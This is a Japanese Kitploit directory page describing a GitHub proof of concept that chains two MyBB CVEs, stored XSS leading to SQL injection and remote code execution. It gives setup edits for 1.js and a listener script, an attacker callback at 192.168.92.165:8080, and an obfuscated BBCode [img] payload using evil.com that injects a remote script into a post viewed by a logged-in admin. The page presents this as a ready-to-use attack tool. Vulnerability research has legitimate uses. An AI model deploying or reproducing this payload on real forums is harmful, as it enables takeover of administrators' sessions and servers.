Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
Mybb-XSS_SQL_RCE-POC — MybbがCVE-2021-27890 & CVE-2021-27889をRCE pocに関連付け | Kitploit
ツール/GitHubGitHub/xiaopan233/mybb-xss_sql_rce-poc
ペイロード生成エクスプロイトウェブアプリケーション悪用
GitHubxiaopan233/mybb-xss_sql_rce-poc

Mybb-XSS_SQL_RCE-POC

MybbがCVE-2021-27890 & CVE-2021-27889をRCE pocに関連付け

リポジトリを見る
1025年前未レビュー

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有

Mybb-XSS_SQL_RCE-POC

Mybbに関連するCVE-2021-27890 & CVE-2021-27889をRCE PoCに

使用前:

ここに2つのファイルがあります: 1.js と attack_listen.py

これらの2つのファイルを修正してください:

1.js:

mybbフォーラムのURLと攻撃URLを修正してください:

root@kitploit:~
var bashurl = 'http://192.168.92.164/mybb/mybb-mybb_1825' #mybb forum url
var attack_url = 'http://192.168.92.165:8080/attack_success' #change the attack machine ip.should keep the same with the attack_listen.py

attack_listen.py

攻撃ホストと攻撃ポートを修正してください:

root@kitploit:~
attack_host = '192.168.92.165'
attack_port = 8080

使用方法:

CVE-2021-27889はXSSです。攻撃を行う前に、以下のペイロードを「New Post Thread」または「Reply」または「Private Messages」に注入してください。このデモでは、ペイロードを「New Post Thread」に送信しています。

注意: 192.168.92.165 は悪意のあるサーバーのIPです。変更してください。

root@kitploit:~
[img]http://evil.com/xx(http://evil.com/onerror=xs1=String.fromCharCode(47);xa1=document.createElement(/script/.source);xa1.src=xs1+xs1+/192.168.92.165/.source+xs1+/1.js/.source;document.getElementById(/header/.source).append(xa1);//[/img]


これで悪意のあるJS 1.js が正常に注入されました。次に、管理者がログインした状態でこの投稿を閲覧するのを待ちます。

注意: 管理者ユーザーはフォーラムのページにログインしている必要はありません。


待機中に、攻撃マシンで「attack_listen.py」を実行して、管理者ユーザーが攻撃されたかどうかを確認します。

root@kitploit:~
python3 attack_listen.py

管理者ユーザーが悪意のある投稿を閲覧すると、悪意のあるJSが攻撃を実行します:


攻撃マシンで情報を受信できます:

ツールをダウンロード